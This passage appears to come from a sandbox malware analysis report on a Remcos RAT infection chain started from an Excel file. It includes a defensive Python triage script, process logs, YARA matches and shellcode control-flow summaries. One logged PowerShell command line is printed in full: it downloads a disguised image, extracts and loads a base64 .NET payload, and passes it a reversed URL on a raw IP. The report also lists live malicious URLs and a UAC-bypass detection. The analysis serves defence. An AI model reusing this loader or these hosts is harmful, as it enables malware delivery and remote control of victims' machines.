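    try:
        txt = bytes.fromhex(data.partition(":")[2].replace(" ", "")).decode("latin-1")
    except ValueError:      # odd length, "[TRUNCATED]" marker, non-hex
        return None
    if not txt.startswith(HTTP_START):
        return None
    first, *rest = txt.split("\r\n")
    pairs = (l.partition(":") for l in rest)
    return first, {k.strip().lower(): v.strip() for k, _, v in pairs if k and v}


def parse_sessions(text):
    """Return one {'process', 'messages'} dict per 'Session ID' block; a message is a dict with
    'ts', 'dir' (OUT = guest -> server), 'line' (request/status line) and 'headers'."""
    sessions, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Session ID"):
            cur = {"process": "", "messages": []}
            sessions.append(cur)
        elif not line or cur is None:
            continue
        elif m := ROW_RE.match(line):
            msg = {"ts": m["ts"], "dir": m["dir"], "line": m["data"], "headers": {}}
            if m["data"].startswith("Data Raw:") and (dec := decode_raw(m["data"])):
                msg["line"], msg["headers"] = dec
            cur["messages"].append(msg)
        elif not cur["messages"]:               # session row: only the process path is unambiguous
            if pm := PROC_RE.search(line):
                cur["process"] = pm.group(1)
        elif ":" in line and not line.startswith("Data "):   # header line of the last message
            k, _, v = line.partition(":")
            cur["messages"][-1]["headers"][k.strip().lower()] = v.strip()
    return sessions


def triage(sessions):
    """Return (kind, process, detail) tuples for the indicators seen in this infection chain."""
    findings = []
    for s in sessions:
        proc, msgs = s["process"].rsplit("\\", 1)[-1] or "?", s["messages"]
        for i, msg in enumerate(msgs):
            if msg["dir"] != "OUT" or msg["line"].startswith("Data "):
                continue
            method, _, rest = msg["line"].partition(" ")
            url = msg["headers"].get("host", "") + rest.split(" ")[0]
            ua = msg["headers"].get("user-agent", "")
            if any(p in ua for p in PROBE_AGENTS):          # Office / WebDAV redirector discovery
                findings.append(("office-discovery-probe", proc, f"{method} {url} [{ua}]"))
            if proc in UNEXPECTED_CLIENTS and method in ("GET", "HEAD"):
                findings.append(("unexpected-web-client", proc, url))
            reply = next((r for r in msgs[i + 1:] if r["dir"] == "IN"), None)
            if reply and reply["line"].startswith("HTTP/1.1 302"):
                loc = reply["headers"].get("location", "")
                if loc.lower().endswith(DOC_EXT):           # shortener handing off to a remote template
                    ip = " (raw IP)" if re.match(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", loc) else ""
                    findings.append(("redirect-to-office-doc", proc, f"{url} -> {loc}{ip}"))
    return findings


# Constructed sample: rows taken from the sessions above; the PROPFIND row is rebuilt as a hex
# dump from the request the report shows decoded, and the .doc URL is the one on the page.
DOC_URL = ("http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontent"
           "tokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc")
PROPFIND = (b"PROPFIND / HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Microsoft-WebDAV-MiniRedir"
            b"/6.1.7601\r\nDepth: 0\r\ntranslate: f\r\nContent-Length: 0\r\nHost: zhort.de\r\n\r\n")
SAMPLE = rf"""
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.224916188.99.66.384433368C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampBytes transferredDirectionData
2024-08-28 04:53:50 UTC321OUTGET /FoNVg0 HTTP/1.1
Host: zhort.de
2024-08-28 04:53:50 UTC590INHTTP/1.1 302 Found
Location: {DOC_URL}

Session IDSource IPSource PortDestination IPDestination Port
4192.168.2.224916688.99.66.38443
TimestampBytes transferredDirectionData
2024-08-28 04:54:00 UTC155OUTData Raw: {PROPFIND.hex(' ')}
2024-08-28 04:54:00 UTC423INHTTP/1.1 404 Not Found
"""

if __name__ == "__main__":
    for kind, proc, detail in triage(parse_sessions(SAMPLE)):
        print(f"{kind:24} {proc:12} {detail}")
```

Decoding the "Data Raw" rows instead of reading the "Data Ascii" rendering is deliberate: the ASCII view strips the CRLFs, so header names and values run into each other, while the hex is the exact bytes on the wire. For anything beyond a one-off triage, take the machine-readable report export rather than the text view; the session-row ambiguity above is a property of the text rendering, not of the capture.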


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      7 | 192.168.2.22 | 49171 | 207.241.232.154 | 443 | 2772 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-08-28 04:54:10 UTC | 111 | OUT | GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                                      Host: ia803104.us.archive.org
                                                                      Connection: Keep-Alive
                                                                      2024-08-28 04:54:10 UTC | 591 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.24.0 (Ubuntu)
                                                                      Date: Wed, 28 Aug 2024 04:54:10 GMT
                                                                      Content-Type: image/jpeg
                                                                      Content-Length: 1931225
                                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                                      Connection: close
                                                                      ETag: "66a41ab4-1d77d9"
                                                                      Strict-Transport-Security: max-age=15724800
                                                                      Expires: Wed, 28 Aug 2024 10:54:10 GMT
                                                                      Cache-Control: max-age=21600
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                      Access-Control-Allow-Credentials: true
                                                                      Accept-Ranges: bytes
                                                                      2024-08-28 04:54:10 UTC | IN | Data Raw: (JPEG response body, raw hex dump omitted)
                                                                      Target ID:0
                                                                      Start time:00:52:59
                                                                      Start date:28/08/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase:0x13f4b0000
                                                                      File size:28'253'536 bytes
                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:00:53:50
                                                                      Start date:28/08/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                      Imagebase:0x13f280000
                                                                      File size:1'423'704 bytes
                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:00:54:02
                                                                      Start date:28/08/2024
                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                      Imagebase:0x400000
                                                                      File size:543'304 bytes
                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:00:54:04
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
                                                                      Imagebase:0xb80000
                                                                      File size:141'824 bytes
                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:00:54:05
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '<obfuscated base64 blob omitted>';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase:0xdf0000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:00:54:06
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                                      Imagebase:0xdf0000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:00:54:12
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:15
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Call Graph

                                                                      callgraph 1 Error: Graph is empty

Module: Sheet1

Declaration
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet2

Declaration
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet3

Declaration
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


                                                                        Execution Graph

                                                                        Execution Coverage:3.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:73.8%
                                                                        Total number of Nodes:42
                                                                        Total number of Limit Nodes:4
execution_graph (rendered graph not recoverable; node summary): 331fba LoadLibraryW -> 331fd4 -> 331fd7 -> 33206f URLDownloadToFileW -> 332088 -> 332097 / 3320a0 ShellExecuteW -> 3320c2 / 3320c5 ExitProcess, with 3320fc returning to 331fe5; 3320c9 GetPEB -> 3320d7; 331edd ExitProcess -> 331ef6 -> 331efc -> 331f12 -> 331f18 -> 331f39 -> 331f3c -> 331fa5 -> 331fa7 -> 331fba LoadLibraryW -> 331fd4 (8 API calls) -> 331fc1 -> 331fe5 / 33206f (8 API calls)

Control-flow Graph

control_flow_graph (function at 33206f; rendered graph not recoverable; block summary): 33206f-332095 URLDownloadToFileW, calls 332088 and 33209d; 332097-3320b7 ShellExecuteW, calls 3320c2; 3320bd-3320c7 ExitProcess; the other blocks in 3320b9-33213f carry no API calls
                                                                        APIs
                                                                        • URLDownloadToFileW.URLMON(00000000,00331FE5,?,00000000,00000000), ref: 00332071
                                                                          • Part of subcall function 00332088: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 003320AF
                                                                          • Part of subcall function 00332088: ExitProcess.KERNEL32(00000000), ref: 003320C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                                        • String ID:
                                                                        • API String ID: 3584569557-0
                                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction ID: b7d3dfa2ba017b154114a74fac40d0413e52dcc8f3e4965d99d6e5adcc0599cd
                                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction Fuzzy Hash: 72F0E5B1A9C38439EB27B7700CCFF6B2E55AFA1B00F550889B2565E4E3D994880CC229

Control-flow Graph

control_flow_graph (function at 33209d; rendered graph not recoverable; block summary): 33209d-3320af ShellExecuteW; 3320b1 calls 3320c2; 3320bd-3320c7 ExitProcess; the other blocks in 3320b6-33213f carry no API calls
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 003320AF
                                                                          • Part of subcall function 003320C2: ExitProcess.KERNEL32(00000000), ref: 003320C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction ID: d9b3b3b9255dc90f98e2b01d2650af8273eb71f5111611fbbba86a1be72abb48
                                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction Fuzzy Hash: 9B0178B4E6438220DF3332348EC6FBB2B46EB92700FC98807FBC0084C5D49498C38629

Control-flow Graph

control_flow_graph (function at 332088; rendered graph not recoverable; block summary): 332088-33208a; 33208a calls 33209d; 33208f-332095; 332097-3320b7 ShellExecuteW, calls 3320c2; 3320bd-3320c7 ExitProcess; the other blocks in 3320b9-33213f carry no API calls
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction ID: 8f1822888a81a6f60c076e9c292ffe4f9ae35f810806925542810b1f61635dfd
                                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction Fuzzy Hash: FE014C30F9834634E773B3304ECABAF6AC6EF92704FA1845AF7910D495D2948847C22D

Control-flow Graph

control_flow_graph (function at 331fba; rendered graph not recoverable; block summary): 331fba-331fbc LoadLibraryW, calls 331fd4; 331fc1-331fc6; 331fc8-332035 calls 33206f; 332036-33206d
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(00331FAC), ref: 00331FBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 25f2aaeb1c1f5c2249ed294ceeb0698778b2950a98b5d46b2ce69151e1164ee1
                                                                        • Instruction ID: 680911f72a42a3ce5e4401fdace448e36afd794f9eb164d9969908ad58bf00b5
                                                                        • Opcode Fuzzy Hash: 25f2aaeb1c1f5c2249ed294ceeb0698778b2950a98b5d46b2ce69151e1164ee1
                                                                        • Instruction Fuzzy Hash: 5F21C3A280D7C21FCB2B87704DBE656BF613927214B5DCACFD0D60A8A3E3989545C793

Control-flow Graph

control_flow_graph (function at 3320c2; rendered graph not recoverable; block summary): single block 3320c2-3320c7 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 003320C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction Fuzzy Hash:

Control-flow Graph

control_flow_graph (function at 3320c9; rendered graph not recoverable; block summary): 3320c9-3320d4 GetPEB; 3320d7-3320e8 calls 3320f1; 3320ea-3320ee
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction ID: 8751f660dd6838666d34c2e9dadc00ab7e8c8a790127ac82ec65bae06f513fad
                                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction Fuzzy Hash: 90D06C712125429BD20ADB04C990E57F36AFBD8615B24C268E5054BA2AD730E896DA94

Control-flow Graph

control_flow_graph (function at 32479e; rendered graph not recoverable; block summary): blocks from 32479e-3247fc through 324c1c-3251be, mostly one- and two-byte blocks; no API calls resolved in this function
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((9
                                                                        • API String ID: 0-3410487528
                                                                        • Opcode ID: d4497076d0a0b811706a7aca8e62bd45fc2afd4056793c57d0f404a1f80e40bf
                                                                        • Instruction ID: ee143fb911c14b13e9ffed81b2c8fdd81f35eca34eb43e9a769f68e833c90bdc
                                                                        • Opcode Fuzzy Hash: d4497076d0a0b811706a7aca8e62bd45fc2afd4056793c57d0f404a1f80e40bf
                                                                        • Instruction Fuzzy Hash: 63920E6244F7D15FC7538B7098B5690BFB0AE13218B2E85DBC4C5CE0A7E25E588AD723

                                                                        Control-flow Graph
                                                                        • Entry block 331edd; basic blocks span 331edd-331fb8; ExitProcess is called from the entry block, with internal calls to 331ef6, 331f39, 331fa5 and 331fba (serialized graph rendering omitted)
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00331ECB), ref: 00331EDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 8f831a929f2bd190acff2866f52086b54ddd8745d3a087e7a7c4dc7e577b947a
                                                                        • Instruction ID: cb78d09a30a3afcc8cdd8178ee8dc9e8067ff446adb58f10dd7efc89e3302162
                                                                        • Opcode Fuzzy Hash: 8f831a929f2bd190acff2866f52086b54ddd8745d3a087e7a7c4dc7e577b947a
                                                                        • Instruction Fuzzy Hash: 6D21365241DBC10FD71797705AEA0A5BF60B923600B5DCBCEC0DA4E8A3E7959946D382

                                                                        Control-flow Graph
                                                                        • Single basic block 322708-322bc5 (serialized graph rendering omitted)
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b406477ba4ac0a08bc97bad2efde38d0ae47b74e4f38927e9e5280eae940b6dc
                                                                        • Instruction ID: 7af6813f02e347cc5d1cc846fb97a4df402b8cd5d23414e07dcf57861c8e8a03
                                                                        • Opcode Fuzzy Hash: b406477ba4ac0a08bc97bad2efde38d0ae47b74e4f38927e9e5280eae940b6dc
                                                                        • Instruction Fuzzy Hash: 8541521102E3C25EE747A77618661D13FB25D67280BDE65EBC4C09FAA7E00A098ED372

                                                                        Control-flow Graph
                                                                        • Single basic block 32cceb-32cf5f (serialized graph rendering omitted)
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21097b48ea6a4fa46c64eb90921ad70dcee2edd695a2c694d7ed9c949ab04541
                                                                        • Instruction ID: b8b98d02aac9552d611192c5ea61a9005332a9f8d47177cf53f490a588b8129b
                                                                        • Opcode Fuzzy Hash: 21097b48ea6a4fa46c64eb90921ad70dcee2edd695a2c694d7ed9c949ab04541
                                                                        • Instruction Fuzzy Hash: B371EA9549E3D11FD74383B4682E9A1BFA12A5712174FD2DFD4C99E9B3E3888806D322
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dfea9ae4210891935b2ce8b423cfb3105e3ac4bad8b86d02603c2707dedfd0c1
                                                                        • Instruction ID: 2709fcc6afe3152214532dc976874c26453f82e534890fb4e56a2839a869d33b
